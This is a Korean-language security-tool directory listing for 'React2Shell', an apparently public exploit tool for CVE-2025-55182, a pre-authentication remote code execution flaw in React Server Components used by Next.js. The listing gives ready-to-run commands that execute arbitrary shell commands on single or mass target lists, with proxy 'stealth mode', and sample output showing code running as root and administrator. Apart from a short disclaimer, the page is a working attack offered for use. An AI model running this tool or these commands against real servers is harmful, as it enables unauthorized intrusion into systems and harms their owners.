Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
React2Shell — CVE-2025-55182-advanced-scanner | Kitploit
도구/GitHubGitHub/ankitspandey07/react2shell
Vulnerability ScannersPayload GenerationExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingRemote Access Tool
GitHubankitspandey07/react2shell

React2Shell

CVE-2025-55182-advanced-scanner

저장소 보기
8개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

@#React2Hell — CVE-2025-55182 취약점 공격 도구

🔥 Next.js / React Server 원격 코드 실행 (RCE) 취약점 공격 도구

root@kitploit:~
█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Security Testing Utility  🚀

════════════════════════════════════════════════════════════════════════
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]

🚀 개요

React2Hell은 Next.js 및 React Server Actions에 영향을 미치는 심각한 원격 코드 실행 취약점인 CVE-2025-55182를 테스트하고 악용하기 위해 설계된 강력한 익스플로잇 도구입니다.

사전 인증 원격 코드 실행 취약점은 React Server Components 버전 19.0.0, 19.1.0, 19.1.1 및 19.2.0에서 다음 패키지를 포함하여 존재합니다: react-server-dom-parcel, react-server-dom-turbopack 및 react-server-dom-webpack. 취약한 코드는 서버 함수 엔드포인트로 전송되는 HTTP 요청의 페이로드를 안전하지 않게 역직렬화합니다.


✨ 기능

  • 🧨 원격 코드 실행 (RCE)
  • 🌐 단일 URL / 대량 URL 스캔
  • 🧩 사용자 정의 명령 실행
  • 🕵️‍♂️ 프록시 지원을 통한 은밀 모드
  • ⚡ 빠르고, 안정적이며, 사용하기 쉬움

📌 사용법

도구 다운로드
단일 대상 모드
root@kitploit:~
python Scanner.py -u https://target.com -c "whoami"

다중 대상 (파일에서)

root@kitploit:~
python Scanner.py -l urls.txt -c "whoami"

HTTP 프록시 (Burp Suite)

root@kitploit:~
python Scanner.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080

HTTPS 프록시

root@kitploit:~
python Scanner.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080

📁 urls.txt 예시

root@kitploit:~
http://site1.com
https://site2.com
http://192.168.1.10:3000

🖥️ 샘플 출력

root@kitploit:~
PS D:\Ankitspandey07\React2Hell> python.exe .\Scanner.py -l .\list.txt -c whoami


█████▄  ▄▄▄▄▄  ▄▄▄   ▄▄▄▄ ▄▄▄▄▄▄ ████▄ ▄▄▄▄▄  ██  ██ ▄▄▄▄▄ ▄▄    ▄▄    
██▄▄██▄ ██▄▄  ██▀██ ██▀▀▀   ██    ▄██▀ ██▄▄   ██████ ██▄▄  ██    ██    
██   ██ ██▄▄▄ ██▀██ ▀████   ██   ███▄▄ ▄▄▄███ ██  ██ ██▄▄▄ ██▄▄▄ ██▄▄▄ 
                                                                
{MAGENTA} Next.js/React Server RCE Exploit — CVE-2025-55182
 Author: Ankit Pandey GitHub: https://github.com/ankitspandey07
    🚀  React2Shell — Security Testing Utility  🚀

════════════════════════════════════════════════════════════════════════
[+] Loaded 3 targets
════════════════════════════════════════════════════════════════════════

[→] Target: http://evil.com:3113/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────

[→] Target: http://example.lab:2000/
[→] Exec:   whoami
[✗] Not vulnerable — Status: 200
────────────────────────────────────────────────────────────────────────

[→] Target: https://tale.lab:3000/
[→] Exec:   whoami
[✓] VULNERABLE — RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
────────────────────────────────────────────────────────────────────────
[✓] Scan complete — Vulnerable: 2
PS D:\Ankitspandey07\React2Hell>

⚠️ 면책 조항

이 도구는 교육 및 보안 연구 목적으로만 만들어졌습니다. 명시적 승인 없이 시스템에 사용하지 마십시오. 귀하는 자신의 행동에 대한 책임이 있습니다.


⭐ 프로젝트 지원

이 익스플로잇이 도움이 되었다면 GitHub에 ⭐를 남겨주세요 ❤️


👤 저자

Ankit Pandey; GitHub: https://github.com/Ankitspandey07

자랑스럽고 열정적인 펜테스터로서 매 순간 배우며 성장하는 누군가가 🔥로 만들었습니다.